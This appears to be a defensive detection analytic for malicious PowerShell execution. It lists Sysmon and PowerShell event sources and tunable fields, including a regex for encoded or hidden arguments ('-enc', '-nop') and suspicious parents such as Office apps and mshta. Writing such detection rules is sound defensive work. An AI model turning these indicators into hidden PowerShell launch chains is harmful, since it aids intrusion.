Detects behavioral chains where PowerShell is launched with encoded commands, unusual parent processes, or suspicious modules loaded, potentially followed by network connections or child process spawning. Supports detection of both direct (powershell.exe) and indirect (.NET automation) invocations.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Command Execution (DC0064) | WinEventLog:PowerShell | EventCode=4104 |
| Process Metadata (DC0034) | WinEventLog:PowerShell | EventCode=400,403 |
| Module Load (DC0016) | WinEventLog:Sysmon | EventCode=7 |
| Field | Description |
|---|---|
| CommandLinePattern | Regex pattern for encoded, obfuscated, or hidden PowerShell arguments (e.g., '-enc', '-nop'). |
| ParentProcessName | Filter based on abnormal parents like Excel, WinWord, or mshta spawning PowerShell. |
| TimeWindow | Scope detection to off-hours, lateral movement timeframes, or non-maintenance windows. |
| LoadedModuleList | Tuneable to monitor rare or never-before-seen .NET assemblies tied to PowerShell abuse. |
| ScriptBlockLengthThreshold | Adjustable threshold for length of script blocks logged by Event ID 4104 (useful for filtering noise). |